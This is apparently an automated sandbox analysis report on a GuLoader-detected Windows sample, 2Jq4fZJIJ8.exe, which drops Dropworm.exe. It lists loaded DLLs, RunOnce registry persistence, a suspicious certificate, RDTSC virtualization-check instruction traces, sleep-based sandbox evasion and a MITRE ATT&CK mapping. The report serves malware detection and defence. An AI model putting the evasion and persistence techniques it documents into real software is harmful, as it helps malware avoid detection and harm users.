            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeProcess created: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe "C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe"
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeProcess created: C:\Users\user\Desktop\2Jq4fZJIJ8.exe "C:\Users\user\Desktop\2Jq4fZJIJ8.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeProcess created: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe "C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe" Jump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: iconcodecservice.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: iconcodecservice.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeFile written: C:\Users\user\kompatible\Sofacyklernes\disapproving.iniJump to behavior
            Source: 2Jq4fZJIJ8.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000000.00000002.1528537573.0000000006497000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2049759112.0000000006017000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1527552230.0000000000787000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2047681752.0000000000595000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1527552230.00000000007CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2047681752.0000000000538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 2Jq4fZJIJ8.exe PID: 7492, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Dropworm.exe PID: 804, type: MEMORYSTR
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeCode function: 0_2_10002D20 push eax; ret 0_2_10002D4E

            Persistence and Installation Behavior

            barindex
            AI detected suspicious PE digital signature
            Source: Initial sampleJoe Sandbox AI: Detected suspicious elements in PE signature: Multiple highly suspicious indicators: 1) Self-signed certificate (issuer same as subject) which is not trusted by system providers 2) Suspicious email domain 'Rdjet116.Ko' appears non-standard and likely fraudulent 3) Organization 'Waterloos' is not a known legitimate company 4) Large time gap between compilation date (2016) and certificate creation (2024) suggests possible certificate manipulation 5) The OU field 'Methodistic Mtaalighed' contains unusual/nonsensical terms 6) While US location is used, the combination of other suspicious elements suggests location spoofing 7) Certificate signature is explicitly marked as invalid by the system 8) The email format 'Rumored@' is highly unusual for a legitimate business certificate
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeFile created: C:\Users\user\AppData\Local\Temp\nseAD0E.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeFile created: C:\Users\user\AppData\Local\Temp\nsmE7DA.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeFile created: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeJump to dropped file
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce TapestryingJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce TapestryingJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce TapestryingJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce TapestryingJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeAPI/Special instruction interceptor: Address: 68928D4
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeAPI/Special instruction interceptor: Address: 26528D4
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeAPI/Special instruction interceptor: Address: 64128D4
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeAPI/Special instruction interceptor: Address: 26528D4
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeRDTSC instruction interceptor: First address: 6846AAD second address: 6846AAD instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F5A2874B231h 0x00000006 cmp dl, FFFFFFE3h 0x00000009 inc ebp 0x0000000a cmp edx, 4AB459DCh 0x00000010 inc ebx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeRDTSC instruction interceptor: First address: 2606AAD second address: 2606AAD instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F5A28C3C7A1h 0x00000006 cmp dl, FFFFFFE3h 0x00000009 inc ebp 0x0000000a cmp edx, 4AB459DCh 0x00000010 inc ebx 0x00000011 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeRDTSC instruction interceptor: First address: 63C6AAD second address: 63C6AAD instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F5A2874B231h 0x00000006 cmp dl, FFFFFFE3h 0x00000009 inc ebp 0x0000000a cmp edx, 4AB459DCh 0x00000010 inc ebx 0x00000011 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeRDTSC instruction interceptor: First address: 2606AAD second address: 2606AAD instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F5A28C3C7A1h 0x00000006 cmp dl, FFFFFFE3h 0x00000009 inc ebp 0x0000000a cmp edx, 4AB459DCh 0x00000010 inc ebx 0x00000011 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nseAD0E.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsmE7DA.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe TID: 2876Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe TID: 7908Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeCode function: 0_2_00405FFD FindFirstFileA,FindClose,0_2_00405FFD
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeCode function: 0_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040559B
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeCode function: 8_2_00405FFD FindFirstFileA,FindClose,8_2_00405FFD
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeCode function: 8_2_00402688 FindFirstFileA,8_2_00402688
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeCode function: 8_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,8_2_0040559B
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeCode function: 9_2_00405FFD FindFirstFileA,FindClose,9_2_00405FFD
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeCode function: 9_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,9_2_0040559B
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeCode function: 9_2_00402688 FindFirstFileA,9_2_00402688
            Source: Dropworm.exe, 0000000C.00000002.2433018640.0000000003387000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWHtA
            Source: Dropworm.exe, 0000000C.00000002.2433018640.0000000003412000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWE
            Source: 2Jq4fZJIJ8.exe, 00000008.00000003.1904180717.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003412000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: 2Jq4fZJIJ8.exe, 00000008.00000003.1904180717.000000000338C000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.0000000003368000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeAPI call chain: ExitProcess graph end nodegraph_0-4791
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeAPI call chain: ExitProcess graph end nodegraph_0-4788
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeAPI call chain: ExitProcess graph end nodegraph_9-3692
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeAPI call chain: ExitProcess graph end nodegraph_9-3696
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeCode function: 0_2_00405050 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard,0_2_00405050
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeProcess created: C:\Users\user\Desktop\2Jq4fZJIJ8.exe "C:\Users\user\Desktop\2Jq4fZJIJ8.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeProcess created: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe "C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe" Jump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeCode function: 0_2_00405D1B GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405D1B
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API            		1
            Registry Run Keys / Startup Folder            		1
            Access Token Manipulation            		11
            Masquerading            		OS Credential Dumping1
            Query Registry            		Remote Services1
            Archive Collected Data            		11
            Encrypted Channel            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading            		11
            Process Injection            		1
            Virtualization/Sandbox Evasion            		LSASS Memory31
            Security Software Discovery            		Remote Desktop Protocol1
            Clipboard Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            Registry Run Keys / Startup Folder            		1
            Access Token Manipulation            		Security Account Manager1
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive3
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading            		11
            Process Injection            		NTDS3
            File and Directory Discovery            		Distributed Component Object ModelInput Capture14
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets24
            System Information Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
            Obfuscated Files or Information            		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
